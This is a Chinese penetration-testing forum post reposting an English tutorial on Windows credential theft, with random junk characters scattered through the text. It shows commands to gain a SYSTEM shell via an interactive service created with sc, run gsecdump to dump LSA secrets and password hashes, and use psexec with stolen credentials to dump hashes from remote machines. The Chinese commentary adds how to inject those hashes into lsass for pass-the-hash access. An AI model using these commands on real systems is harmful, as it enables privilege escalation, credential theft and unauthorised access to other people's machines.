找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 HASH注入式攻击
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1874|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:, {% G, r' Z; ?* @/ R% |
; R8 U7 Y6 a/ k
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
6 N9 O7 m. C. ?8 T& z; H[SC] CreateService SUCCESS$ J, y, y* y/ I; \& L( j

  e: u( S" M, g4 c" q* ^C:\>sc start shellcmdline2 i+ t. x' t8 q
[SC] StartService FAILED 1053:
& L& T2 V$ _. t$ _7 i0 V$ f9 c% c
The service did not respond to the start or control request in a timely fashion.. j  C. b, c( g/ a; y
+ u( w4 {1 h7 K- w5 o9 U) w
C:\>sc delete shellcmdline$ U" g& N' O$ p$ j( O$ Z9 k
[SC] DeleteService SUCCESS
, k) D9 |0 B7 q. }  U6 y) G. Y) @1 b. g- S7 {+ J, }6 R
------------0 f% d: M. N1 w- R: u7 W
7 N9 m. w% o$ O) o9 C6 t9 A  @1 `/ ~
Then in the new DOS window:) L  `( W1 {5 h7 L3 y' ?

# H/ u  L$ e* [0 \- CMicrosoft Windows XP [Version 5.1.2600]" V: M9 z. \3 X  A- ?
(C) Copyright 1985-2001 Microsoft Corp.& F& A# y) Q- L6 M4 q# X6 t$ C. |

( B# k/ e! r( w5 r0 DC:\WINDOWS\system32>whoami" ~2 m( A8 s' H  u5 I3 m, H3 d
NT AUTHORITY\SYSTEM4 ?& C0 S9 ^7 F; Y, s5 z7 }, V2 r4 m
( b1 `9 h& m% [% {- s! X* G" ~6 d
C:\WINDOWS\system32>gsecdump -h
: {" ~) A  D2 v1 Bgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
/ ]& c6 R3 W9 O5 Tusage: gsecdump [options]
* U( ?, E* Y- x/ u# J
: y+ b( G  p4 n" uoptions:
- P% ?3 D" s3 K* i0 _& Z-h [ --help ] show help
5 a: E- W2 u# M-a [ --dump_all ] dump all secrets+ R+ ~8 A' P* d: w5 g
-l [ --dump_lsa ] dump lsa secrets8 N5 R: j" F8 z& t5 V. L+ }
-w [ --dump_wireless ] dump microsoft wireless connections( s# z# g; W  L) p3 z( t6 j
-u [ --dump_usedhashes ] dump hashes from active logon sessions
; G! ?6 I+ f/ v-s [ --dump_hashes ] dump hashes from SAM/AD
' ?3 ^$ u* B! w* ?, k( _2 W8 W$ t
, z: ?$ b: i# l* sAlthough I like to use:
1 O/ |8 L' W; J3 {4 G. U: [
) o- p& L7 W5 m  Q! p' P; s6 iPsExec v1.83 - Execute processes remotely
1 H! a& [) P! _( c  O; qCopyright (C) 2001-2007 Mark Russinovich, e1 G) j# R5 C# O  L6 W
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
" A6 |: b1 `' G2 k' U
# Z' H! M) E+ }' ?5 C  G; |C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
  v2 f' B3 y) n8 j* z7 b% M3 \( z) m' `: H4 g  i
to get the hashes from active logon sessions of a remote system.
3 P' ]; s/ H7 J. _6 @
9 {% g! D0 @# b! G3 _' ]) ~* H2 ~% wThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
% w- l2 {; T4 s1 }, o7 n8 ]$ U' I/ m, L$ x3 X6 d
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.' f& c( }6 a1 b( `
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]1 K& `. G3 b/ a& A" F% I' `
0 D3 j% r$ i4 c9 O$ B( X
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。9 m) {5 q  {' x' j5 y# L5 w
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表